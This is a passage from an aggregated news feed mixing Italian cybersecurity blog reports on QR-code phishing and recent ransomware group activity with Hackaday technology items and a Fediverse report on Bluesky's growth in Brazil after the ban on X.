Questo sarebbe il motivo per cui il Dipartimento di Stato ha rafforzato le capacità delle ONG, che nel 2018 hanno condannato la Russia per aver tentato di vietare Telegram. Benz afferma il Dipartimento di Stato degli Stati Uniti avrebbe “armato” Telegram – attraverso la potenza della sua chat crittografata e tutte le sue funzionalità – per fomentare proteste e rivolte in Russia, proprio come hanno fatto in Bielorussia, proprio come hanno fatto in Iran, proprio come hanno fatto a Hong Kong, proprio come hanno tentato di fare in Cina. Telegram ha quasi un miliardo di utenti, sui quali non solo agisce la propaganda americana ma anche quella russa e questo è un problema in questo momento in Ucraina. “Solo due settimane dopo la tua intervista con Pavel, Radio Free Europe, che è un’istituzione creata dalla CIA che l’ha gestita direttamente per i suoi primi 20 anni – ha definito Telegram una spia nelle tasche di ogni ucraino e ha sostenuto che l’Ucraina deve avere il controllo su Telegram”.

“Forse il motivo per cui l’Ucraina sta perdendo è perché la Russia sa tutto quello che fa l’Ucraina”, conclude ma è una cosa di pura fantasia pensare che l’Ucraina stia “perdendo una guerra di terra contro un paese con 100 milioni di persone in più perché Pavel Durov ha un accordo segreto con Putin”. Ciò non toglie che la libertà di parola su Internet, “sta consentendo l’ascesa di Marine Le Pen in Francia” che sta perdendo anche la capacità di tenere sotto controllo il continente africano dove in alcuni paesi vengono bruciate le bandiere francesi e issate quelle russe al pari del taglio dei legami diplomatici con l’Ucrana.. In Europa “sta consentendo l’ascesa del partito Vox in Spagna, AfD in Germania” e così via.

Proteggere i dati degli utenti “a tutti i costi”


Ora però mi verrebbe da dire che dovremmo francamente domandarci se la libertà di parola debba dipendere solo da un social o un servizio di messaggistica. Dovremmo – ma questa è solo una mia considerazione che può anche non essere condivisa – farci un esame di coscienza sulla nostra dipendenza digitale, perchè se si finisce all’interno di un Panopticon per essere osservati da chiuqnue la scelta è anche nostra, non dei paladini del free speech.

A questo si aggiunge che gli sforzi di monetizzazione vengono fatti da tutte queste app, che per rendersi “autosostenibili finanziariamente” introducono abbonamenti e offerte pubblicitarie, soprattutto nel caso di Telegram che guarderebbe – parole di Durov – ad una possibile quotazione in borsa: nel marzo del 2024 Telegram ha raccolto 330 milioni di dollari tramite vendite obbligazionarie.

La società è poi legata alle transazioni in criptovalute e strettamente associata a Grab – token decentralizzato e completamente gestito dalla comunità – e a Toncoin, una criptovaluta inizialmente sviluppata dal team di Telegram e che ha attirato investitori russi individuali e istituzionali, tra gli altri, che hanno sofferto negli ultimi giorni perdite significative.

18898723Fonte: CoinMarketCap

L’età oscura dell’informazione: “The hacker spirit breaks any spell”


Il 19 agosto è uscita una nuova pubblicazione di Phrack Magazine (71): nell’introduzione si evidenzia come oggi non solo le buone informazioni siano più difficili da trovare, ma che quelle cattive le stanno
sommergendo. Fortunatamente però, ci sono ancora gli hacker, che possiamo lavorare insieme per mantenere le buone informazioni e amplificare le voci di coloro che le creano e le curano.

“The hacker spirit breaks any spell”: “lo spirito hacker distrugge ogni incantesimo, ha il potere di creare nuovi metodi di comunicazione e collaborazione, di modellare il mondo e creare un percorso attorno ad ogni nuovo muro eretto. Non è solo questione di computer, si tratta di capire come funziona il mondo. Perché “un hacker è qualcuno che capisce come funziona il mondo” e “Se qualcuno ti dice che l’hacking è morto, è perché non è coinvolto nel vero e proprio hacking. Potrebberlo essere stati. Potrebbero volerlo essere. E questo non ha nulla a che fare con le loro conoscenze o abilità tecniche. Lo è e basta. E se chiunque cerchi di parlare a nome di tutti gli hacker, o di tutto l’hacking, non lo fa”. [Rodrigo Branco].

L'articolo Pavel Durov, Telegram: la libertà di espressione non è priva di responsabiltà proviene da il blog della sicurezza informatica.



Ultra-Black Material, Sustainably Made from Wood


18894885

Researchers at the University of British Columbia leveraged an unusual discovery into ultra-black material made from wood. The deep, dark black is not the result of any sort of dye or surface coating; it’s structural change to the wood itself that causes it to swallow up at least 99% of incoming light.
18894887One of a number of prototypes for watch faces and jewelry.
The discovery was partially accidental, as researchers happened upon it while looking at using high-energy plasma etching to machine the surface of wood in order to improve it’s water resistance. In the process of doing so, they discovered that with the right process applied to the right thickness and orientation of wood grain, the plasma treatment resulted in a surprisingly dark end result. Fresh from the plasma chamber, a wood sample has a thin coating of white powder that, once removed, reveals an ultra-black surface.

The resulting material has been dubbed Nxylon (the name comes from mashing together Nyx, the Greek goddess of darkness, with xylon the Greek word for wood) and has been prototyped into watch faces and jewelry. It’s made from natural materials, the treatment doesn’t create or involve nasty waste, and it’s an economical process. For more information, check out UBC’s press release.

You have probably heard about Vantablack (and how you can’t buy any) and artist Stuart Semple’s ongoing efforts at making ever-darker and accessible black paint. Blacker than black has applications in optical instruments and is a compelling thing in the art world. It’s also very unusual to see an ultra-black anything that isn’t the result of a pigment or surface coating.


hackaday.com/2024/09/02/ultra-…



Allarme Quishing! I Codici QR e Microsoft Sway in un Nuovo Attacco Phishing


I ricercatori di cybersecurity hanno scoperto una nuova e allarmante minaccia: una campagna di phishing basata su codici QR, chiamata “quishing“. Questo attacco sfrutta in modo ingegnoso l’infrastruttura di Microsoft Sway, un popolare strumento cloud per la creazione di presentazioni e documenti, per ospitare pagine fraudolente. Questa scoperta mette in luce un pericolo insidioso: anche i servizi cloud più affidabili possono essere trasformati in potenti armi nelle mani dei cybercriminali.

“Utilizzando applicazioni cloud riconosciute, gli attaccanti riescono a infondere fiducia nelle vittime, che si sentono più sicure nell’interagire con i contenuti forniti“, spiega Jan Michael Alcantara, ricercatore presso Netskope Threat Labs. “Quando una vittima apre una pagina Sway (Pagina web interattiva), spesso lo fa già autenticata con il proprio account Microsoft 365, il che può contribuire a legittimare l’attacco agli occhi dell’utente. Sway, inoltre, può essere facilmente condiviso tramite link o incorporato in un sito web tramite un tag iframe.”

Gli attacchi hanno preso di mira principalmente utenti in Asia e Nord America, con particolare attenzione ai settori della tecnologia, della produzione e della finanza.

Microsoft Sway, lanciato nel 2015, è uno strumento cloud-based per la creazione di newsletter, presentazioni e documentazione. Secondo quanto riportato da una nota azienda di sicurezza, si è registrato un aumento di 2.000 volte nel traffico verso pagine di phishing uniche ospitate su Sway a partire da luglio 2024. L’obiettivo di questi attacchi è rubare le credenziali degli utenti Microsoft 365, utilizzando falsi codici QR che, una volta scansionati, reindirizzano a siti web di phishing.

In alcune di queste campagne di quishing, gli aggressori utilizzano Cloudflare Turnstile per nascondere i domini agli scanner di URL statici, complicando ulteriormente i tentativi di rilevamento. L’attività si distingue anche per l’impiego di tecniche di phishing Adversary-in-the-Middle (AitM), che sottraggono sia le credenziali sia i codici di autenticazione a due fattori (2FA), riproducendo pagine di login identiche a quelle originali.

“L’uso di codici QR per reindirizzare le vittime a siti di phishing pone una sfida considerevole per i difensori della sicurezza”, osserva Alcantara. “Poiché l’URL è incorporato in un’immagine, gli scanner di e-mail che analizzano solo testo possono essere facilmente ingannati. Inoltre, quando una vittima scansiona un codice QR con un dispositivo mobile, spesso meno protetto rispetto a laptop o desktop, si espone a rischi maggiori.”

Non è la prima volta che Microsoft Sway viene sfruttato per attacchi di phishing. Già nell’aprile 2020, Group-IB aveva documentato una campagna chiamata PerSwaysion, che aveva compromesso gli account e-mail aziendali di oltre 150 dirigenti in Germania, Regno Unito, Paesi Bassi, Hong Kong e Singapore.

Questo nuovo sviluppo arriva in un momento in cui le campagne di quishing stanno diventando sempre più sofisticate. Mentre i fornitori di sicurezza affinano le loro tecnologie di rilevamento, gli aggressori rispondono con nuove tecniche, come il “Unicode QR Code Phishing“.

J. Stephen Kowski, CTO di SlashNext, sottolinea come questi codici QR, composti interamente da caratteri Unicode, riescano a bypassare le tradizionali misure di sicurezza. Questi codici appaiono normali sugli schermi, ma risultano diversi quando visualizzati come testo, rendendo ancora più complessi i tentativi di rilevamento.

L'articolo Allarme Quishing! I Codici QR e Microsoft Sway in un Nuovo Attacco Phishing proviene da il blog della sicurezza informatica.



Pibiesse, la tipografia che guarda al futuro


@Notizie dall'Italia e dal mondo
Il nuovo articolo di @valori@poliversity.it
La Pibiesse è una tipografia, ma anche un progetto di innovazione sociale che vuole diventare modello per la riqualificazione del territorio
L'articolo Pibiesse, la tipografia che guarda al futuro proviene da Valori.

valori.it/pibiesse-storie-dal-…



Luglio e Agosto Infuocati anche in Italia: Nuove Tendenze Ransomware ee Evoluzione degli Attacchi RaaS


Nel bel mezzo nella stagione fatta da spiagge e temperature aride i movimenti dei RaaS si sono fatti altrettanto caldi. Tra TTPs e nuovi metodi per nascondere attività maligne, il periodo di Luglio ed Agosto hanno portato alla luce interessanti metodi operativi con risultati da non sottovalutare.

Qilin – Brokers & Credentials Harvesting


Il RaaS Qilin è noto per operazioni non standardizzate ed omogenee tra loro ma ultimamente, grazie ai professionisti di Incident Response e Digital Forensics, stanno venendo alla luce pattern in quanto alle attività d’attacco. La prima componente è un uso sempre più massiccio di Initital Access Brokers comprando credenziali raccolte in precedenza, queste credenziali vengono spesso usate per accedere a VPN aziendali sfruttando la mancanza di MFA. Gli operator di Qilin hanno mostrato una estrema pazienza rispetto alla concorrenza mantenendo la loro presenza tra i 10 e 20 giorni prima di schierare il decryptor.

Una volta ottenuta la persistenza gli operator iniziano ad enumerare la rete in cerca di asset critici (come domain controllers) cercando di ottenere i permessi necessari per i loro obiettivi. Una volta ottenuti viene creata una GPO (Group Policy Domain) con incluso uno script powershell chiamato IPScanner.ps1, tale strumento permette di eseguire lo script (tramite un file .bat) all’interno di ogni singola macchina connessa al dominio vittima. È stato scoperto che l’esecuzione dello script permette l’estrazione di credenziali all’interno del Google Chrome estraendo dalle decine alle centinaia di password salvate all’interno del browser. Tramite le credenziali ottenute si riesce in maniera (relativamente) facile ad eseguire movimenti orizzontali e verticali fino all’utilizzo del ransomware.

Abusare Google Chrome non dovrebbe stupire nessuno visto che il browser con più di 50% di utilizzo nel mercato e gli utenti tendono a salvare le credenziali per comodità. La quantità di dati ottenuti con facilità non è solamente strettamente neccessaria all’operazion in se ma possono essere riutilizzati o venduti. Importante spiegare agli utenti e/o dipendenti di non utilizzare dispositivi a scopo lavorativo per attività personali, in caso contrario si ottiene un rischio (non necessario) di exfiltration di dati personali e non solamente aziendali rendendo vittime gli utenti e i loro asset personali.

Nonostante le dense attività di Qilin e la loro reputazione li renda un bersaglio favorito alle forze dell’ordine non hanno fermato il gruppo a reinventarsi, la loro pazienza è stata ripagata con il furto di dati di valore che potrebbero permettere un ulteriore pivot dalla quale monetizzare o costruire nuovi attacchi.

3AM & INC Ransomware – No More (Healthy) Rules


Per chi non segue in maniera periodica la scena ransomware gli attacchi ad asset di servizi healtcare potrebbero sembrare eccezzioni visti i regolamenti interni ai RaaS che hanno da sempre contraddistinto queste attività criminali. Purtroppo i codici di onore sono sempre più assenti oppure rimangono una semplice facciata senza un nulla di fatto, il sopracitato Qilin RaaS ha alzato (o abbassato, dipende dai punti di vista) il livello colpendo la non-profit Promise2Kids ma tutto l’ecosistema sta ormai abbandonando i valori che contrasstiguevano i predecessori.

3AM (RaaS di cui RHC ha descritto le potenzialità nel Report Ransomware H1 2024) ha colpito un’altra azienda healtcare no-profit chiamata Kootenai Health (Idaho, USA) rubando circa 464,000 record di pazienti contenenti social security numbers, record medici, diagnosi ed altro legato alla salute di quest’ultimi. Dopo aver eseguito il loro ransomware (scritto in Rust) per criptare i dati nella giornata del 24 Marzo 2024 hanno rilasciato i dati per intero solo di recente nel 13 Agosto 2024.
18888722

Come gia discusso in queste sedi 3AM è sembrato sin da subito un RaaS funzionale, spawnato in un periodo ideale (dove LockBit ha dato i primi segni di cedimento) per potersi afferrare una fetta di mercato. Le indagini ed analisi svolte portano a pensare che Conti sia in qualche modo correlato a 3AM, cosa da non escludere vista l’alta efficenza di questo nuovo gruppo.

Inolte abbiamo una ulteriore azienda di Healtcare chiamata McLaren dove nella prima settimana sono stati sorpresi da un disruption di computer e telefoni ne mentre le stampanti hanno iniziato a far uscire ransom note rivendicando l’attacco al gruppo ransomware INC RANSOM
18888724

Tale gruppo ha un focus importatne su healthcare e government preferendo un approccio Big Bounty Game preferendo poche vittime ma con un potenziale di pagamento più alto rispetto ad un alto numero di attacchi. McLaren ha fatto uno statement pubblico scusandosi con i suoi clienti che sono stati impattati dall’attacco :

“We understand this situation may be frustrating to our patients – and to our team members – and we deeply and sincerely apologize for any inconvenience this may cause […] We kindly ask for your patience while our caregivers and support teams work as diligently as ever to provide our communities the care they need and deserve.”

McLaren è gia stata precedentemente attaccata con successo il 4 Ottobre 2023 da BLACKHAT/ALPHV che gli è costato un leak di 2.5 millioni di persone con record simili a quelli ottenuti da 3AM sopra citati. Questo conferma che essere vittima di un attacco non comporta in nessun modo periodi di “immunità e che le misure di resilienza devono essere applicate da subito, un secondo attacco a distanza di 8/9 mesi evidenzia inufficenti procedure di security mantenendo vulnerabile McLaren.

BlackSuit – Enough is enough?


CISA e FBI hanno voluto portare l’attenzione su BLACKSUIT, le loro indagini hanno rilevato come questo gruppo sia un rebrand di Royal vista la condivisione di IoC e TTPs. Ultimamente BlackSuit sta chiedendo dei ransom molto elevati rispetto alla media con un range che varia da 1 ai 10 millioni di dollari di riscatto. Il massimo raggiunto è stato di $60 millioni con un guadagno totale di $500 millioni, una quantità non da poco considerando la loro breve presenza nella scena. Da considerare che mediamente i ransom risiedono nel range $200k-$2 MLN.

Rimamendo sull’economia del settore, ChainAnalysis ha pubblicato un report dichiarando e dimostrando con i dati collezzionati come il 2024 promette di essere l’anno più remunerativo per i RaaS. Ad esempio nello stesso periodo (Luglio) del 2023 il totale ottenuto ammontava a $200k ma nel 2024 è più che triplicata raggiungendo la cifra di $1,500,000. Da notare come la top 6 dei RaaS è responsabile del 50% degli attacchi mostrando come il settore si stia evolvendo con vere e proprie “multinazionali che riescono a raccogliere un alto numero di affiliati (vedi RansomHub) e conseguente numero di attacchi. La top 6 è composta da LockBit, 8Base, Play, RansomHub, Akira e BlackBasta.

Conclusioni – Lo scenario italiano


Le reti all’interno dello stivale non sono state risparmiate, alla scrittura di questo articolo il numero di attacchi da inizio anno ammonta a 95. Chiaramente si tratta solamente degli attacchi rivendicati pubblicamente con Akira e RansomHub in cima alla classifica. Nel mese di Luglio l’Italia è il paese europeo con il più alto numero di attacchi (ben 13).

Abbiamo cambiamenti riguardo al settore di government & compliance con l’introduzione di NIS2 ma sopratutto ACN, in accordo con DNA e Polizia Di Stato, hanno instaurato un accordo per lo scambio di informazioni riguardante gli attacchi informatici. Una buona notizia che può finalmente aiutare tutti gli stakeholder italiani portando ad una protezione proattiva basata sul reciproco scambio ed una trasparenza da tanto ricercata nel settore.

Nonostante il relativo basso numero di attacchi rispetto alla scena internazionale l’Italia non è stata risparmiata di attacchi ad asset notevoli. Tra l’Università di Siena e SynLab anche noi abbiamo ricevuto furti, con conseguente cifratura, di alta quantità di dati sensibili. Tutto ciò che è stato scritto sopra provengono da fonti estere dove la cultura della trasparenza sembra essere ormai lo standard e che effettivamente aiutano la community ad ottenere informazioni importanti per la costruzione di un threat model e metodi di difesa adeguati.

In nessuna operazione che ha necessitato la presenza di ACN o CSIRT sono state spiegate TTP, risultati di forensics e neanche il nome del Threat Actor dovendosi affidare a ciò che viene rivendicato dal lato criminale. Fondamentale l’importanza a dichiarare pubblicamente da dove è stato originato l’attacco, i metodi utilizzati per muoversi all’interno della rete e il risultato di tale attacco in maniera trasparente donando al pubblico informazioni preziose per potersi difendere.

Si augura che questo nuovo accordo possa segnare l’inizio di una nuova frontiera per la sicurezza digitale italiana basata sulla collaborazione ed apertura totale da parte delle istituzioni. Potersi finalmente affidare ad informazioni interne al territorio senza dover usare esclusivamente fonti esterne (e quindi targettizate per il pubblico non italiano) è ciò che si è atteso da tempo ma che finalmente sembra essere una realtà anche in Italia permettendo un continuo miglioramento dell’industria.

L'articolo Luglio e Agosto Infuocati anche in Italia: Nuove Tendenze Ransomware ee Evoluzione degli Attacchi RaaS proviene da il blog della sicurezza informatica.



Aerei e navi nella tassonomia europea: Bruxelles dovrà risponderne in tribunale


@Notizie dall'Italia e dal mondo
Il nuovo articolo di @valori@poliversity.it
Bruxelles etichetta come “investimenti verdi” aerei e navi inquinanti: una coalizione di ong la trascina in tribunale
L'articolo Aerei e navi nella tassonomia europea: Bruxelles dovrà risponderne in tribunale proviene da Valori.



A Mini NUC Rack for Your Desktop


An adorable mini rack for NUCs, plus a 5-port switch.

We (well, some of us) are complete suckers for things that are both much smaller and much larger than life. And if that thing actually does what its supposed to? Squee! So naturally, we rushed to bring you news of this mini NUC rack designed by [Jeremy Weatherford].

Inspiration comes from a lot of places, often times from stuff that lives on your desk. [Jeremy] had a pile of NUCs and thought they resembled a mini rack already, so why not build them one to live in? It was the perfect excuse to learn CAD, so off [Jeremy] went. Although this is a mini rack, the parts were too big to print. Another opportunity presented itself, and [Jeremy] tried out an online service to get the acrylic cut.

Assembly may have been fiddly with super glue all over the nice black acrylic, but [Jeremy] learned an important tip: excess glue can be removed with vegetable oil. Once it was built, he decided to make it into a control system lab and even found a perfect little five-port switch to top it off. The logo plate, of course, is the icing on this cake.

If you prefer your tower of mini-computers to be extruded, we covered a clever design from [Jay Doscher] back in May.


hackaday.com/2024/09/01/a-mini…



La minaccia di LOCKBIT ritorna in Italia: Attacco ransomware contro GB Ricambi


Il famoso gruppo di cybercriminali LockBit ha rivendicato un nuovo attacco informatico ai danni di GB Ricambi, azienda italiana specializzata nella produzione e distribuzione di ricambi e componenti per macchine agricole e movimento terra.

18886233

L’attacco è stato rivendicato sul Data Leak Site (DLS) di LockBit 3.0, dove il gruppo ha dichiarato di aver violato i sistemi di GB Ricambi. Tuttavia, non sono stati forniti dettagli specifici sui dati compromessi, lasciando in sospeso l’entità effettiva della violazione e l’impatto potenziale per i clienti coinvolti.

L’attacco a GB Ricambi


18886235

La ransomware gang ha rilasciato poche informazioni sull’attacco, non specificando né la tipologia né la quantità dei dati esfiltrati. Si sono limitati a impostare un conto alla rovescia di circa 11 giorni per la pubblicazione e la diffusione dei dati sottratti.

La Situazione Attuale


In data 18/06/2024, GB Ricambi ha rilasciato un comunicato in cui affermano che, GB RICAMBI S.p.A. ha rilevato un accesso non autorizzato a documenti commerciali contenenti dati anagrafici di alcuni clienti, come nome, cognome, comune, provincia e indirizzo email.
18886237
Non sono state compromesse le credenziali di accesso al portale di e-commerce. L’azienda ricorda ai clienti di non fornire mai codici personali o password via email o telefono. Hanno preso provvedimenti immediati e informato l’Autorità Garante per la protezione dei dati personali.

Difatti, in tale data è stato confermato un attacco da parte di un altro gruppo ransomware, RansomHub, che ha pubblicato i dati esfiltrati di circa 400 GigaByte.

18886239

Conclusioni


Attualmente, non siamo in grado di confermare se i dati esfiltrati da LockBit coincidano con quelli pubblicati da RansomHub. Questa incertezza ci impedisce di escludere la possibilità che GB Ricambi possa aver subito un ulteriore attacco, distinto da quello inizialmente rivendicato.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

L'articolo La minaccia di LOCKBIT ritorna in Italia: Attacco ransomware contro GB Ricambi proviene da il blog della sicurezza informatica.



VR Headset with HDMI Input Invites a New Kind of Cyberdeck


18880540

Meta’s Quest VR headset recently got the ability to accept and display video over USB-C, and it’s started some gears turning in folks’ heads. [Ian Hamilton] put together a quick concept machine consisting of a Raspberry Pi 400 that uses a VR headset as its monitor, which sure seems like the bones of a new breed of cyberdeck.
18880542With passthrough on, one still sees the outside world.
The computer-in-a-keyboard nature of the Pi 400 means that little more than a mouse and the VR headset are needed to get a functional computing environment. Well, that and some cables and adapters.

What’s compelling about this is that the VR headset is much more than just a glorified monitor. In the VR environment, the external video source (in this case, the Raspberry Pi) is displayed in a window just like any other application. Pass-through can also be turned on, so that the headset’s external cameras display one’s surroundings as background. This means there’s no loss of environmental awareness while using the rig.

Video over USB-C is technically DisplayPort altmode, and both the video source and the USB-C cable have to support it. In [Ian]’s case, the Raspberry Pi 400 outputs HDMI and he uses a Shadowcast 2 capture card to accept HDMI on one end and outputs video over USB-C on the other.

As a concept it’s an interesting one for sure. Perhaps we’ll see decks of this nature in our next cyberdeck contest?


hackaday.com/2024/09/01/vr-hea…



Hackaday Links: September 1, 2024


Hackaday Links Column Banner

Why is it always a helium leak? It seems whenever there’s a scrubbed launch or a narrowly averted disaster, space exploration just can’t get past the problems of helium plumbing. We’ve had a bunch of helium problems lately, most famously with the leaks in Starliner’s thruster system that have prevented astronauts Butch Wilmore and Suni Williams from returning to Earth in the spacecraft, leaving them on an extended mission to the ISS. Ironically, the launch itself was troubled by a helium leak before the rocket ever left the ground. More recently, the Polaris Dawn mission, which is supposed to feature the first spacewalk by a private crew, was scrubbed by SpaceX due to a helium leak on the launch tower. And to round out the helium woes, we now have news that the Peregrine mission, which was supposed to carry the first commercial lander to the lunar surface but instead ended up burning up in the atmosphere and crashing into the Pacific, failed due to — you guessed it — a helium leak.

Thankfully, there’s a bit more technical detail on that last one; it seems that a helium pressure control valve, designated PCV2 and controlling helium to pressurize an oxidizer tank, got stuck open thanks to “vibration-induced relaxation” in threaded components within the valve. So, launch vibrations shook a screw loose inside the valve, which kept it from sealing and over-pressurized an oxidizer tank with helium to the point of tank failure — kablooie, end of mission. All of these failures are just another way of saying that space travel is really, really hard, of course. But still, with helium woes figuring so prominently in so many failures, we’re left wondering if there might not be an upside to finding something else to pressurize tanks.

Back on terra firma, we got a tip from a reader going by the name of [Walrus] who is alarmed by an apparent trend in the electronics testing market toward a subscription model for the software needed to run modern test gear. Specifically, the tip included a link to a reseller offering a deal on an “Ultimate Software Bundle” for Tektronix 4 Series Mixed-Signal Oscilloscopes. The offer expired at the end of 2023 and prices aren’t mentioned, but given that a discount of up to $5,670 with purchase of a scope was advertised, we’d imagine the Ultimate Software Bundle comes at a pretty steep price. The chief concern [Walrus] expressed was about the possibility that used instruments whose software is tied to a subscription may have little to no value in the secondary market, where many up-and-coming engineers shop for affordable gear. We haven’t had any personal experience with subscription models for test equipment software, and a quick read of the Tektronix site seems to suggest that subscriptions are only one of the models available for licensing instrument software. Still, the world seems to be moving to one where everything costs something forever, and that the days of a “one and done” purchase are going away. We’d love to hear your thoughts on subscription software for test gear, especially if we’ve misread the situation with Tek. Sound off in the comments below.

In this week’s edition of “Dystopia Watch,” we’re alarmed by a story about how police departments are experimenting with generative AI to assist officers in report writing. The product, called Draft One, is from Axon, a public safety technology concern best known for its body-worn cameras and tasers. Using Azure OpenAI, Draft One transcribes the audio from body cam footage and generates a “draft narrative” of an officer’s interaction with the public. The draft is then reviewed by the officer, presumably corrected if needed, and sent on to a second reviewer before becoming the official report. Axon reports that it had to adjust the LLM’s settings to keep AI hallucinations from becoming part of the narrative. While we can see how this would be a huge benefit to officers, who generally loathe everything about report writing, and would get them back out on patrol rather than sitting in a parking lot tapping at a keyboard, we can also see how this could go completely sideways in a hurry. All it will take is one moderately competent defense attorney getting an officer to admit under oath that the words of the report were not written by him or her, and this whole thing goes away.

And finally, getting three (or more) monitors to all agree on what white is can be quite a chore, and not just a little enraging for the slightly obsessive-compulsive — it’s one of the reasons we favor dark mode so much, to be honest. Luckily, if you need a screen full of nothing but #FFFFFF pixels so you can adjust color balance in your multi-monitor setup, it’s as easy as calling up a web page. The White Screen Tool does one thing — paints all the pixels on the screen whatever color you want. If you need all white, it’s just a click away — no need to start up MS Paint or GIMP and futz around with making it bezel-to-bezel. There are plenty of other presets, if white isn’t your thing, plus a couple of fun animated screens that imitate Windows update screens — let the office hijinks begin! You can also set custom colors, which is nice; might we suggest #1A1A1A and #F3BF10?


hackaday.com/2024/09/01/hackad…



Film, As You Have Never Had It Explained Before


18866885

For all the advances in digital photography, there remains a mystique for photographers and filmmakers about chemical film. Using it presents an artistic and technical challenge, and it lends an aesthetic to your work which is difficult to find in other ways. But particularly when it comes to moving pictures, how many of us have ever ventured beyond the Super 8 cartridge? If you’re not lucky enough to have a Spielberg budget, [Stand-Up Maths] is here with a video taking the viewer through the various movie film formats. He claims it’s the first video shot for YouTube in 35mm, and given that his first point is about the costs involved, we can see why.

In particular it serves as an introduction to the various film terms and aspect ratios. We all know what full frame and IMAX are, but do many of us know what they really mean in camera terms. A particularly neat demonstration comes when he has two cameras side by side with the same stock as a split screen, one 35mm and the other 16mm. The cheaper smaller framed format is good quality, but using a profession resolution chart you can see some of the differences clearly. The full film is below the break, and we’d suggest you watch it in the full 4K resolution if you are able to.

Meanwhile, some of us have been known to dabble in 8mm film, and even sometimes shoot footage with it.

youtube.com/embed/QYUE696k6GY?…

Thanks [Jurjen] for the tip.


hackaday.com/2024/09/01/film-a…



L'Ucraina viene distrutta - ma nessuno in Occidente vuole assumersene la responsabilità - professore americano
controinformazione.info/lucrai…


Bluesky experiences a massive new wave of signups from Brazil, Premium feeds with sub.club, and much more.
[share author='Laurens Hof' profile='https://fediversereport.com/author/laurenshof/' avatar='https://poliverso.org/photo/206608119366e42c304ffac007248590-5.jpeg?ts=1734620326' link='https://fediversereport.com/last-week-in-fediverse-ep-82/' posted='2024-09-01 18:04:28' guid='08552256-1db60dc7714646e3-cb23b587' message_id='https://fediversereport.com/last-week-in-fediverse-ep-82/']Last Week in Fediverse – ep 82

1 million new accounts on Bluesky as Brazil bans X, and premium feeds with Sub.club, and much much more.

Brazil bans X, and a signup wave to Bluesky


The Brazilian supreme court has banned the use of X in an ongoing legal fight with Elon Musk. The ban follows after a long trajectory of legal issues between the Brazilian government and Musk’s X. In April 2024, the Brazilian court ordered X to block certain X accounts that were allegedly related to the 2023 coup attempt, which Musk refused to do. In that same time period, President Luiz Inácio Lula da Silva opened an account on Bluesky, and there was already an inflow of a Brazilian community into Bluesky. Now, the legal fight has further escalated over X’s refusal to appoint a legal representative in the country, and Musk’s continuing refusal to comply with Brazil’s laws and regulation has resulted in the supreme court banning the use of X in the country altogether.

The ban on X has caused a massive signup wave to Bluesky, with over 1 million new accounts created in just three days, of which the large majority are from Brazil. The user statistics shot up even more than that, suggesting that there are a lot of people with an existing account logging back in as well.

The new inflow of people to Bluesky is having some significant effects on the network, as well as on the state of decentralised social networks more broadly:

  • President Lula is putting actual focus on Bluesky. In one of his final posts on X, Luala listed in non-alphabetical order all other platforms that he is active on, and placed Bluesky at the top of the list. Posts by Lula that are placed on Bluesky (134k followers) as well as on Threads (2.4m followers) get more than 5 times as much likes on Bluesky. Today, Lula explicitly asked people on Bluesky what they thought about the platform, in a post that got over 30k likes and counting. It is hard to imagine that the Brazilian government is not paying attention to this all, and is looking which platform(s) the Brazilian community is moving towards in the wake of the ban on X.
  • Brazilians are a very active community on the internet (see Orkut), and bring with them their own unique culture to Bluesky. The current decentralised social networks are heavily focused on US politics, judged by top posts on both Mastodon and Bluesky, and beyond shitposts and memes there is surprisingly little space for mainstream pop culture and sports. The Brazilian community does seem to bring a large number of pop culture and sports to Bluesky, significantly diversifying the topics of discussion, and in turn, creating more space for other people who are interested in that in the future. The activity of Brazilians on microblogging can also be seen in the like counts on popular posts of Bluesky: before this week, the most popular posts of any given day usually got around 3k likes, this has sprung up to 30k to 50k likes. Brazilians are so chatty in fact, that currently 81% of the posts on the network are in Portugese, and the amount of accounts of people who post on a given day has gone up from a third to over 50%.
  • The Bluesky engineers have build a very robust infrastructure system, and the platform has largely cruised along fine without issues, even when faced with a 15x increase in traffic. This all without having to add any new servers. For third party developers, such as the Skyfeed developer, this increase in traffic did came with downtime and more hardware requirements however. It shows the complications of engineering an open system, while the Bluesky team itself was prepared with their core infrastructure, third party infrastructure, on which a large number of custom feeds rely, was significantly less prepared for the massive increase in traffic.

In contrast, the ban on X in Brazil has made little impact on Mastodon, with 3.5k new signups from Brazil on Mastodon.social. I’d estimate that this week has seen 10k new accounts above average, with 15k new accounts the previous week and 25k in this week. That places Mastodon two orders of magnitude behind Bluesky in signups from Brazil. There are a variety of reasons for this, which deserve their own analysis, this newsletter is long enough as it is. One thing I do want to point out is within fediverse community there are two sub communities that each have their own goals and ideas about the fediverse and growth. Some people responded with the news that most Brazilians went to Bluesky with type of response that indicated that they appreciate the small, quiet and cozy community that the fediverse currently provides, and a distrust of the growth-at-all-costs model for social networks. For other people however, their goal of the fediverse is to build a global network that everyone is a part of and everyone uses (‘Big Fedi’), a view of the fediverse that is also represented in the latest episode of the Waveform podcast (see news below). And if the goal is to build ActivityPub into the default protocol for the social web, it is worth paying attention to what is happening right now in the Brazilian ATmosphere.

The News


Sub.club is a new way to monetise feeds on the fediverse, with the goal of bringing the creator economy to the fediverse. It gives people the ability to create premium feeds that people can only access via a subscription. People can follow this feed from any Mastodon account (work on other fediverse platforms is ongoing). Sub.club handles the payment processes and infrastructure, for which they charge 6% of the subscription fee (compared to 8-12% Patreon charges). Sub.club also makes it possible for other apps to integrate, both IceCubes and Mammoth have this option. Bart Decrem, who is one of the people behind Sub.club, is also the co-founder of the Mastodon app Mammoth. Sub.club also explicitly positions itself as a way for server admins to fund their server. Most server admins rely on donations by their users, often via services like Patreon, Ko-fi, Open Collective or other third party options. By integration payments directly into the fediverse, Sub.club hopes that the barrier for donations will be lower, and more server admins can be financially sustainable.

